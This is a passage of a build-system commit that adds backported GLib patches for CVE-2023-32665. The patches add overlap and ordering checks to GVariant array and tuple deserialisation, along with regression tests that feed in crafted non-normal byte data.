+@@ -264,6 +265,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+ value.type_info = g_variant_type_info_element (value.type_info);
+ g_variant_type_info_ref (value.type_info);
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -295,7 +297,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1 };
++ GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
+
+ gvs_filler (&child, children[0]);
+ }
+@@ -317,6 +319,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+ /* proper element size: "Just". recurse to the child. */
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -358,6 +361,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+ value.data = NULL;
+
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return value;
+ }
+@@ -388,7 +392,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised value,
+ {
+ if (n_children)
+ {
+- GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1 };
++ GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
+
+ /* write the data for the child. */
+ gvs_filler (&child, children[0]);
+@@ -408,6 +412,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+ value.type_info = g_variant_type_info_element (value.type_info);
+ value.size--;
+ value.depth++;
++ value.ordered_offsets_up_to = 0;
+
+ return g_variant_serialised_is_normal (value);
+ }
+@@ -691,6 +696,32 @@ gvs_variable_sized_array_n_children (GVariantSerialised value)
+ return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+
++/* Find the index of the first out-of-order element in @data, assuming that
++ * @data is an array of elements of given @type, starting at index @start and
++ * containing a further @len-@start elements. */
++#define DEFINE_FIND_UNORDERED(type) \
++ static gsize \
++ find_unordered_##type (const guint8 *data, gsize start, gsize len) \
++ { \
++ gsize off; \
++ type current, previous; \
++ \
++ memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
++ for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current)) \
++ { \
++ memcpy (&current, data + off, sizeof (current)); \
++ if (current < previous) \
++ break; \
++ previous = current; \
++ } \
++ return off / sizeof (current) - 1; \
++ }
++
++DEFINE_FIND_UNORDERED (guint8);
++DEFINE_FIND_UNORDERED (guint16);
++DEFINE_FIND_UNORDERED (guint32);
++DEFINE_FIND_UNORDERED (guint64);
++
+ static GVariantSerialised
+ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ gsize index_)
+@@ -706,6 +737,49 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+ g_variant_type_info_ref (child.type_info);
+ child.depth = value.depth + 1;
+
++ /* If the requested @index_ is beyond the set of indices whose framing offsets
++ * have been checked, check the remaining offsets to see whether they’re
++ * normal (in order, no overlapping array elements). */
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ switch (offsets.offset_size)
++ {
++ case 1:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint8 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 2:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint16 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 4:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint32 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ case 8:
++ {
++ value.ordered_offsets_up_to = find_unordered_guint64 (
++ offsets.array, value.ordered_offsets_up_to, index_ + 1);
++ break;
++ }
++ default:
++ /* gvs_get_offset_size() only returns maximum 8 */
++ g_assert_not_reached ();
++ }
++ }
++
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ /* Offsets are invalid somewhere, so return an empty child. */
++ return child;
++ }
++
+ if (index_ > 0)
+ {
+ guint alignment;
+@@ -840,6 +914,9 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+
+ g_assert (offset == offsets.data_size);
+
++ /* All offsets have now been checked. */
++ value.ordered_offsets_up_to = G_MAXSIZE;
++
+ return TRUE;
+ }
+
+@@ -1072,7 +1149,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ for (i = 0; i < length; i++)
+ {
+ const GVariantMemberInfo *member_info;
+- GVariantSerialised child;
++ GVariantSerialised child = { 0, };
+ gsize fixed_size;
+ guint alignment;
+ gsize end;
+@@ -1132,6 +1209,9 @@ gvs_tuple_is_normal (GVariantSerialised value)
+ offset = end;
+ }
+
++ /* All element bounds have been checked above. */
++ value.ordered_offsets_up_to = G_MAXSIZE;
++
+ {
+ gsize fixed_size;
+ guint alignment;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 81343e9..99d18ef 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -29,6 +29,14 @@ typedef struct
+ guchar *data;
+ gsize size;
+ gsize depth; /* same semantics as GVariant.depth */
++ /* If ordered_offsets_up_to == n this means that all the frame offsets up to and
++ * including the frame offset determining the end of element n are in order.
++ * This guarantees that the bytes of element n don't overlap with any previous
++ * element.
++ *
++ * This is both read and set by g_variant_serialised_get_child for arrays of
++ * non-fixed-width types */
++ gsize ordered_offsets_up_to;
+ } GVariantSerialised;
+
+ /* deserialisation */
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 0e5ec8e..967e9a1 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,5 +1,6 @@
+ /*
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -1283,6 +1284,7 @@ random_instance_filler (GVariantSerialised *serialised,
+ serialised->size = instance->size;
+
+ serialised->depth = 0;
++ serialised->ordered_offsets_up_to = 0;
+
+ g_assert_true (serialised->type_info == instance->type_info);
+ g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -5039,6 +5041,47 @@ test_normal_checking_array_offsets (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that array elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_832242 */
++static void
++test_normal_checking_array_offsets2 (void)
++{
++ const guint8 data[] = {
++ 'h', 'i', '\0',
++ 0x03, 0x00, 0x03,
++ 0x06, 0x00, 0x06,
++ 0x09, 0x00, 0x09,
++ 0x0c, 0x00, 0x0c,
++ 0x0f, 0x00, 0x0f,
++ 0x12, 0x00, 0x12,
++ 0x15, 0x00, 0x15,
++ };
++ gsize size = sizeof (data);
++ const GVariantType *aaaaaaas = G_VARIANT_TYPE ("aaaaaaas");
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (aaaaaaas, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 2);
++
++ expected = g_variant_new_parsed (
++ "[[[[[[['hi', '', ''], [], []], [], []], [], []], [], []], [], []], [], []]");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+ * normalised successfully without looping infinitely. */
+ static void
+@@ -5206,6 +5249,8 @@ main (int argc, char **argv)
+ test_normal_checking_tuples);
+ g_test_add_func ("/gvariant/normal-checking/array-offsets",
+ test_normal_checking_array_offsets);
++ g_test_add_func ("/gvariant/normal-checking/array-offsets2",
++ test_normal_checking_array_offsets2);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
new file mode 100644
index 0000000000..c057729aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
@@ -0,0 +1,113 @@
+From 345cae9c1aa7bf6752039225ef4c8d8d69fa8d76 Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:09:12 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out code to get bounds of a tuple
+ member
+
+This introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/345cae9c1aa7bf6752039225ef4c8d8d69fa8d76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 73 ++++++++++++++++++++++++--------------
+ 1 file changed, 46 insertions(+), 27 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fe0b1a4..6f9b366 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,51 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ * for the tuple. See the notes in gvarianttypeinfo.h.
+ */
+
++static void
++gvs_tuple_get_member_bounds (GVariantSerialised value,
++ gsize index_,
++ gsize offset_size,
++ gsize *out_member_start,
++ gsize *out_member_end)
++{
++ const GVariantMemberInfo *member_info;
++ gsize member_start, member_end;
++
++ member_info = g_variant_type_info_member_info (value.type_info, index_);
++
++ if (member_info->i + 1)
++ member_start = gvs_read_unaligned_le (value.data + value.size -
++ offset_size * (member_info->i + 1),
++ offset_size);
++ else
++ member_start = 0;
++
++ member_start += member_info->a;
++ member_start &= member_info->b;
++ member_start |= member_info->c;
++
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++ member_end = value.size - offset_size * (member_info->i + 1);
++
++ else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++ {
++ gsize fixed_size;
++
++ g_variant_type_info_query (member_info->type_info, NULL, &fixed_size);
++ member_end = member_start + fixed_size;
++ }
++
++ else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++ member_end = gvs_read_unaligned_le (value.data + value.size -
++ offset_size * (member_info->i + 2),
++ offset_size);
++
++ if (out_member_start != NULL)
++ *out_member_start = member_start;
++ if (out_member_end != NULL)
++ *out_member_end = member_end;
++}
++
+ static gsize
+ gvs_tuple_n_children (GVariantSerialised value)
+ {
+@@ -997,33 +1042,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+ }
+ }
+
+- if (member_info->i + 1)
+- start = gvs_read_unaligned_le (value.data + value.size -
+- offset_size * (member_info->i + 1),
+- offset_size);
+- else
+- start = 0;
+-
+- start += member_info->a;
+- start &= member_info->b;
+- start |= member_info->c;
+-
+- if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
+- end = value.size - offset_size * (member_info->i + 1);
+-
+- else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+- {
+- gsize fixed_size;
+-
+- g_variant_type_info_query (child.type_info, NULL, &fixed_size);
+- end = start + fixed_size;
+- child.size = fixed_size;
+- }
+-
+- else /* G_VARIANT_MEMBER_ENDING_OFFSET */
+- end = gvs_read_unaligned_le (value.data + value.size -
+- offset_size * (member_info->i + 2),
+- offset_size);
++ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+
+ /* The child should not extend into the offset table. */
+ if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
new file mode 100644
index 0000000000..7e516b07ab
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
@@ -0,0 +1,80 @@
+From 73d0aa81c2575a5c9ae77dcb94da919579014fc0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:13:02 +0000
+Subject: [PATCH] gvariant-serialiser: Rework child size calculation
+
+This reduces a few duplicate calls to `g_variant_type_info_query()` and
+explains why they’re needed.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/73d0aa81c2575a5c9ae77dcb94da919579014fc0]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 31 +++++++++----------------------
+ 1 file changed, 9 insertions(+), 22 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 6f9b366..fb75923 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1007,14 +1007,18 @@ gvs_tuple_get_child (GVariantSerialised value,
+ child.depth = value.depth + 1;
+ offset_size = gvs_get_offset_size (value.size);
+
++ /* Ensure the size is set for fixed-sized children, or
++ * g_variant_serialised_check() will fail, even if we return
++ * (child.data == NULL) to indicate an error. */
++ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++ g_variant_type_info_query (child.type_info, NULL, &child.size);
++
+ /* tuples are the only (potentially) fixed-sized containers, so the
+ * only ones that have to deal with the possibility of having %NULL
+ * data with a non-zero %size if errors occurred elsewhere.
+ */
+ if G_UNLIKELY (value.data == NULL && value.size != 0)
+ {
+- g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+ /* this can only happen in fixed-sized tuples,
+ * so the child must also be fixed sized.
+ */
+@@ -1032,29 +1036,12 @@ gvs_tuple_get_child (GVariantSerialised value,
+ else
+ {
+ if (offset_size * (member_info->i + 1) > value.size)
+- {
+- /* if the child is fixed size, return its size.
+- * if child is not fixed-sized, return size = 0.
+- */
+- g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+- return child;
+- }
++ return child;
+ }
+
+- gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+-
+ /* The child should not extend into the offset table. */
+- if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+- {
+- GVariantSerialised last_child;
+- last_child = gvs_tuple_get_child (value,
+- g_variant_type_info_n_members (value.type_info) - 1);
+- last_end = last_child.data + last_child.size - value.data;
+- g_variant_type_info_unref (last_child.type_info);
+- }
+- else
+- last_end = end;
++ gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
++ gvs_tuple_get_member_bounds (value, g_variant_type_info_n_members (value.type_info) - 1, offset_size, NULL, &last_end);
+
+ if (start < end && end <= value.size && end <= last_end)
+ {
+--
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
new file mode 100644
index 0000000000..8558a7911f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
@@ -0,0 +1,396 @@
+From 7cf6f5b69146d20948d42f0c476688fe17fef787 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 12:09:06 +0000
+Subject: [PATCH] gvariant: Don't allow child elements of a tuple to overlap
+ each other
+
+This is similar to the earlier commit which prevents child elements of a
+variable-sized array from overlapping each other, but this time for
+tuples. It is based heavily on ideas by William Manley.
+
+Tuples are slightly different from variable-sized arrays in that they
+contain a mixture of fixed and variable sized elements. All but one of
+the variable sized elements have an entry in the frame offsets table.
+This means that if we were to just check the ordering of the frame
+offsets table, the variable sized elements could still overlap
+interleaving fixed sized elements, which would be bad.
+
+Therefore we have to check the elements rather than the frame offsets.
+
+The logic of checking the elements up to the index currently being
+requested, and caching the result in `ordered_offsets_up_to`, means that
+the algorithmic cost implications are the same for this commit as for
+variable-sized arrays: an O(N) cost for these checks is amortised out
+over N accesses to O(1) per access.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/7cf6f5b69146d20948d42f0c476688fe17fef787]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c | 6 +-
+ glib/gvariant-serialiser.c | 40 ++++++++
+ glib/gvariant-serialiser.h | 7 +-
+ glib/gvariant.c | 1 +
+ glib/tests/gvariant.c | 181 +++++++++++++++++++++++++++++++++++++
+ 5 files changed, 232 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9b51e15..b951cd9 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2007, 2008 Ryan Lortie
+ * Copyright © 2010 Codethink Limited
++ * Copyright © 2022 Endless OS Foundation, LLC
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -179,7 +180,7 @@ struct _GVariant
+ * offsets themselves.
+ *
+ * This field is only relevant for arrays of non
+- * fixed width types.
++ * fixed width types and for tuples.
+ *
+ * .tree: Only valid when the instance is in tree form.
+ *
+@@ -1117,6 +1118,9 @@ g_variant_get_child_value (GVariant *value,
+ */
+ s_child = g_variant_serialised_get_child (serialised, index_);
+
++ /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
++ value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++
+ /* Check whether this would cause nesting too deep. If so, return a fake
+ * child. The only situation we expect this to happen in is with a variant,
+ * as all other deeply-nested types have a static type, and hence should
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fb75923..cd4a3e6 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,10 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ * for the tuple. See the notes in gvarianttypeinfo.h.
+ */
+
++/* Note: This doesn’t guarantee that @out_member_end >= @out_member_start; that
++ * condition may not hold true for invalid serialised variants. The caller is
++ * responsible for checking the returned values and handling invalid ones
++ * appropriately. */
+ static void
+ gvs_tuple_get_member_bounds (GVariantSerialised value,
+ gsize index_,
+@@ -1028,6 +1032,42 @@ gvs_tuple_get_child (GVariantSerialised value,
+ return child;
+ }
+
++ /* If the requested @index_ is beyond the set of indices whose framing offsets
++ * have been checked, check the remaining offsets to see whether they’re
++ * normal (in order, no overlapping tuple elements).
++ *
++ * Unlike the checks in gvs_variable_sized_array_get_child(), we have to check
++ * all the tuple *elements* here, not just all the framing offsets, since
++ * tuples contain a mix of elements which use framing offsets and ones which
++ * don’t. None of them are allowed to overlap. */
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ gsize i, prev_i_end = 0;
++
++ if (value.ordered_offsets_up_to > 0)
++ gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++
++ for (i = value.ordered_offsets_up_to; i <= index_; i++)
++ {
++ gsize i_start, i_end;
++
++ gvs_tuple_get_member_bounds (value, i, offset_size, &i_start, &i_end);
++
++ if (i_start > i_end || i_start < prev_i_end || i_end > value.size)
++ break;
++
++ prev_i_end = i_end;
++ }
++
++ value.ordered_offsets_up_to = i - 1;
++ }
++
++ if (index_ > value.ordered_offsets_up_to)
++ {
++ /* Offsets are invalid somewhere, so return an empty child. */
++ return child;
++ }
++
+ if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET)
+ {
+ if (offset_size * (member_info->i + 2) > value.size)
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 99d18ef..144aec8 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -34,8 +34,11 @@ typedef struct
+ * This guarantees that the bytes of element n don't overlap with any previous
+ * element.
+ *
+- * This is both read and set by g_variant_serialised_get_child for arrays of
+- * non-fixed-width types */
++ * This is both read and set by g_variant_serialised_get_child() for arrays of
++ * non-fixed-width types, and for tuples.
++ *
++ * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
++ * rather than an index into the frame offsets. */
+ gsize ordered_offsets_up_to;
+ } GVariantSerialised;
+
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index d6f68a9..cdb428e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+ serialised.type_info = g_variant_get_type_info (trusted);
+ serialised.size = g_variant_get_size (trusted);
+ serialised.data = g_malloc (serialised.size);
++ serialised.ordered_offsets_up_to = G_MAXSIZE; /* operating on the normal form */
+ g_variant_store (trusted, serialised.data);
+ g_variant_unref (trusted);
+
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 967e9a1..a84b02e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,6 +1,7 @@
+ /*
+ * Copyright © 2010 Codethink Limited
+ * Copyright © 2020 William Manley
++ * Copyright © 2022 Endless OS Foundation, LLC
+ *
+ * This library is free software; you can redistribute it and/or
+ * modify it under the terms of the GNU Lesser General Public
+@@ -1451,6 +1452,7 @@ test_maybe (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised,
+ random_instance_filler,
+@@ -1574,6 +1576,7 @@ test_array (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1738,6 +1741,7 @@ test_tuple (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) instances, n_children);
+@@ -1834,6 +1838,7 @@ test_variant (void)
+ serialised.data = flavoured_malloc (needed_size, flavour);
+ serialised.size = needed_size;
+ serialised.depth = 0;
++ serialised.ordered_offsets_up_to = 0;
+
+ g_variant_serialiser_serialise (serialised, random_instance_filler,
+ (gpointer *) &instance, 1);
+@@ -5106,6 +5111,176 @@ test_normal_checking_tuple_offsets (void)
+ g_variant_unref (variant);
+ }
+
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that tuple elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838503 and
++ * https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838513 */
++static void
++test_normal_checking_tuple_offsets2 (void)
++{
++ const GVariantType *data_type = G_VARIANT_TYPE ("(yyaiyyaiyy)");
++ const guint8 data[] = {
++ 0x12, 0x34, 0x56, 0x78, 0x01,
++ /*
++ ^───────────────────┘
++
++ ^^^^^^^^^^ 1st yy
++ ^^^^^^^^^^ 2nd yy
++ ^^^^^^^^^^ 3rd yy
++ ^^^^ Framing offsets
++ */
++
++ /* If this variant was encoded normally, it would be something like this:
++ * 0x12, 0x34, pad, pad, [array bytes], 0x56, 0x78, pad, pad, [array bytes], 0x9A, 0xBC, 0xXX
++ * ^─────────────────────────────────────────────────────┘
++ *
++ * ^^^^^^^^^^ 1st yy
++ * ^^^^^^^^^^ 2nd yy
++ * ^^^^^^^^^^ 3rd yy
++ * ^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed (
++ "@(yyaiyyaiyy) (0x12, 0x34, [], 0x00, 0x00, [], 0x00, 0x00)");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets3 (void)
++{
++ /* The expected decoding of this non-normal byte stream is complex. See
++ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++ * specification.
++ *
++ * The rule “Child Values Overlapping Framing Offsets” from the specification
++ * says that the first `ay` must be decoded as `[0x01]` even though it
++ * overlaps the first byte of the offset table. However, since commit
++ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++ * this as it’s exploitable. So the first `ay` must be given a default value.
++ *
++ * The second and third `ay`s must be given default values because of rule
++ * “End Boundary Precedes Start Boundary”.
++ *
++ * The `i` must be given a default value because of rule “Start or End
++ * Boundary of a Child Falls Outside the Container”.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayiay)");
++ const guint8 data[] = {
++ 0x01, 0x00, 0x02,
++ /*
++ ^──┘
++
++ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
++ 2nd ay, bytes 2-0
++ i, bytes 0-4
++ 3rd ay, bytes 4-1
++ ^^^^^^^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed ("@(ayayiay) ([], [], 0, [])");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
++/* This is a regression test that overlapping entries in the offset table are
++ * decoded consistently, even though they’re non-normal.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_910935 */
++static void
++test_normal_checking_tuple_offsets4 (void)
++{
++ /* The expected decoding of this non-normal byte stream is complex. See
++ * section 2.7.3 (Handling Non-Normal Serialised Data) of the GVariant
++ * specification.
++ *
++ * The rule “Child Values Overlapping Framing Offsets” from the specification
++ * says that the first `ay` must be decoded as `[0x01]` even though it
++ * overlaps the first byte of the offset table. However, since commit
++ * 7eedcd76f7d5b8c98fa60013e1fe6e960bf19df3, GLib explicitly doesn’t allow
++ * this as it’s exploitable. So the first `ay` must be given a default value.
++ *
++ * The second `ay` must be given a default value because of rule “End Boundary
++ * Precedes Start Boundary”.
++ *
++ * The third `ay` must be given a default value because its framing offsets
++ * overlap that of the first `ay`.
++ */
++ const GVariantType *data_type = G_VARIANT_TYPE ("(ayayay)");
++ const guint8 data[] = {
++ 0x01, 0x00, 0x02,
++ /*
++ ^──┘
++
++ ^^^^^^^^^^ 1st ay, bytes 0-2 (but given a default value anyway, see above)
++ 2nd ay, bytes 2-0
++ 3rd ay, bytes 0-1
++ ^^^^^^^^^^ Framing offsets
++ */
++ };
++ gsize size = sizeof (data);
++ GVariant *variant = NULL;
++ GVariant *normal_variant = NULL;
++ GVariant *expected = NULL;
++
++ variant = g_variant_new_from_data (data_type, data, size, FALSE, NULL, NULL);
++ g_assert_nonnull (variant);
++
++ g_assert_false (g_variant_is_normal_form (variant));
++
++ normal_variant = g_variant_get_normal_form (variant);
++ g_assert_nonnull (normal_variant);
++ g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 3);
++
++ expected = g_variant_new_parsed ("@(ayayay) ([], [], [])");
++ g_assert_cmpvariant (expected, variant);
++ g_assert_cmpvariant (expected, normal_variant);
++
++ g_variant_unref (expected);
++ g_variant_unref (normal_variant);
++ g_variant_unref (variant);
++}
++
+ /* Test that an empty object path is normalised successfully to the base object
+ * path, ‘/’. */
+ static void
+@@ -5253,6 +5428,12 @@ main (int argc, char **argv)
+ test_normal_checking_array_offsets2);
+ g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+ test_normal_checking_tuple_offsets);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets2",
++ test_normal_checking_tuple_offsets2);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets3",
++ test_normal_checking_tuple_offsets3);
++ g_test_add_func ("/gvariant/normal-checking/tuple-offsets4",
++ test_normal_checking_tuple_offsets4);
+ g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+ test_normal_checking_empty_object_path);
+
+--
+2.24.4
+
